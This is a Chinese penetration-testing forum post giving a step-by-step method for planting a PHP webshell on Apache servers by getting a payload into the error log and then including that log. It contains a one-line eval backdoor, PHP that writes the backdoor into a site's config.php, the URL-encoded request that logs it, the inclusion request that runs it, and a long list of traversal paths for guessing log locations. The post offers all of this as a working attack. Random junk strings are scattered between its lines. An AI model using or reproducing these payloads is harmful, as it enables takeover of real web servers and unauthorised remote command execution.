找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
返回列表 发新帖
查看: 2488|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
, N6 Q, u( o; l6 U* ^: ~# K
; w" j! J/ c6 O2 \7 U; z9 p比如还是这句一句话木马
. C9 j+ y4 q) b4 s3 H! u' l; e<?eval($_POST[cmd]);?>   0 v1 ]# n3 K/ S& C. k8 }3 b

7 U3 O  j4 c$ R$ ]/ j' y' @到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
  X9 B) T6 c1 y3 c2 \+ G% X4 c) }3 Yfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
  Q0 U* F3 C6 X9 j/ m6 z+ u0 B4 R: a2 K
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
, o) }; y# U$ y+ w+ tfclose($fp);?>   //在config.php里写入一句木马语句 6 a8 `! F; E1 l  V2 T' O

- A+ N6 W# ]" ?6 \我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
5 u" K0 e3 |2 Z$ V转换为 9 x( T- m( a6 _7 O& t) ?0 R3 g) r& k
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
# A2 O% ~6 M/ V3 i- u  ?1 ]config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 2 w, }" w' Z  x+ g  ^+ s
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B ) x0 a$ m" j+ V* ~& m
fclose%28%24fp%29%3B%3F%3E
$ u; O& Y; P5 \% Q我们提交
9 I- W2 T8 H9 N, ?, m: r9 [http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
1 n9 d$ H) f/ ?: o% N% `%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp # d; A6 x! ~5 [
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B 3 |( J1 [$ \% j6 P: N# Z
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
6 }! g( i( e5 B# Z8 |5 x& v/ [' q& s( D! \
这样就错误日志里就记录下了这行写入webshell的代码。 1 |' n2 R; I7 D
我们再来包含日志,提交
- V! h" v" y: ^6 {4 ~. |http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log + d, }0 \1 b( {( u$ b
; Y6 `. z1 k- ]' x% F. _
这样webshell就写入成功了,config.php里就写入一句木马语句 : L: P+ T- W- h! W: E, |
OK. - [; }) L" }/ A4 `, M/ n; K
http://www.xxx.com/forum/config.php这个就成了我们的webshell
1 \+ l) t. {. ^" j8 T' R5 @直接用lanker的客户端一连,主机就是你的了。
1 Z+ _+ m7 }- I, _
( Z: R/ s; ?- J9 c9 t! g7 m& nPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 1 f- N1 d8 j) u' v
2 k/ E/ [+ e# ^1 r4 M
其他的日志路径,你可以去猜,也可以参照这里。
& n* M! f5 `5 q../../../../../../../../../../var/log/httpd/access_log . M8 W% Q( m% V2 ~$ r5 {
../../../../../../../../../../var/log/httpd/error_log
+ x/ A5 A; r5 v$ Y$ v) [4 Q../apache/logs/error.log
. y1 v  x- t, f# {) M2 J" Y5 m../apache/logs/access.log
4 E' V4 a$ e9 }" O( c0 p+ _3 D; U# i../../apache/logs/error.log
+ S3 F6 c# |7 n7 e' |( {9 U../../apache/logs/access.log ' e/ `6 X0 F, Y; m3 G+ K, Y8 K" t
../../../apache/logs/error.log 4 g/ c+ G% }5 N5 y9 r8 S
../../../apache/logs/access.log 0 D% q. f! v" U0 W( x
../../../../../../../../../../etc/httpd/logs/acces_log
4 d/ p* L$ U/ c) a  s0 {" p../../../../../../../../../../etc/httpd/logs/acces.log
* E' v; p# m6 X: c" ~9 x  O../../../../../../../../../../etc/httpd/logs/error_log
3 |6 c) F: E1 o' r../../../../../../../../../../etc/httpd/logs/error.log
9 M' s: w: z' r! t1 v4 z% X../../../../../../../../../../var/www/logs/access_log
- c7 g9 {' j0 e% H- s, F, p5 U! i../../../../../../../../../../var/www/logs/access.log
9 w- J7 r7 ^# |4 t../../../../../../../../../../usr/local/apache/logs/access_log . E, }! t9 s, h2 N* O
../../../../../../../../../../usr/local/apache/logs/access.log
0 |: T4 b# Q* t) c../../../../../../../../../../var/log/apache/access_log
8 U( m3 ]' {6 r/ m, d, P8 k../../../../../../../../../../var/log/apache/access.log
- z! [5 m# {, j) o! ?' q../../../../../../../../../../var/log/access_log
2 X+ e/ _& l4 d../../../../../../../../../../var/www/logs/error_log * {' u7 P- K3 A0 i. I0 s9 n2 p9 F
../../../../../../../../../../var/www/logs/error.log " t6 |+ @! Y6 ]7 I& x1 {
../../../../../../../../../../usr/local/apache/logs/error_log ( a# r+ R; F8 `2 j
../../../../../../../../../../usr/local/apache/logs/error.log . p0 ~  H$ {& G% L
../../../../../../../../../../var/log/apache/error_log
$ B5 H$ N' {. |  e' ~- R! p../../../../../../../../../../var/log/apache/error.log + r' W( P9 m6 P; {. h3 p6 U2 {
../../../../../../../../../../var/log/access_log : w* R( N4 q2 }
../../../../../../../../../../var/log/error_log
. J' f6 p. v& e% q/var/log/httpd/access_log       : G2 v* e& c! y" k; f$ k3 b
/var/log/httpd/error_log     + I" M5 i5 x  i  |+ R  a: H$ Z
../apache/logs/error.log     
1 h- v# Y. R+ a# y../apache/logs/access.log   j5 m% E4 f$ O- h% z7 h( \, j
../../apache/logs/error.log
+ }# Y) P9 m: g* g% b* ?1 b' V../../apache/logs/access.log
1 ]1 v( K* e+ c; L# S' `" A7 M../../../apache/logs/error.log
! |8 M5 w7 N+ O../../../apache/logs/access.log : s7 z4 f2 v, q, Z* s* d9 V/ {0 ]) p
/etc/httpd/logs/acces_log
' X# _* w/ O' p/etc/httpd/logs/acces.log
) S1 d" |3 }$ Y# y$ u; s/etc/httpd/logs/error_log 1 G, F/ J/ l" S3 H. }$ |) Z
/etc/httpd/logs/error.log 4 [- w* A& F0 K% z( t9 i6 m
/var/www/logs/access_log
$ S) D, K* v# M% \" c8 q: ?/var/www/logs/access.log . R" E7 x' N  l2 W5 ~4 P  b7 G
/usr/local/apache/logs/access_log
4 P9 y4 \$ J1 x) T/usr/local/apache/logs/access.log
1 Z) o- R5 y& \4 e; ^3 O8 ~/var/log/apache/access_log 4 _- y' S. H9 H( s- b/ O$ G+ w
/var/log/apache/access.log
7 i5 m" }: J8 \9 x  h( g/var/log/access_log 6 M' @: t+ P! `/ K  z1 H
/var/www/logs/error_log $ N( _1 R" t. V, g6 R" ?
/var/www/logs/error.log
- u$ w' j+ s5 r. e& E* o$ F/usr/local/apache/logs/error_log
% ?+ D- K: \& ~9 ]8 |% Q5 l/usr/local/apache/logs/error.log $ R; b% x. ?  R# T' i4 ?% ~
/var/log/apache/error_log
% G0 [0 o0 @6 [( Q) D& O  m+ L/var/log/apache/error.log
3 Z, w% |1 K) X/var/log/access_log
* I/ p. U% f& ?7 l$ B/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表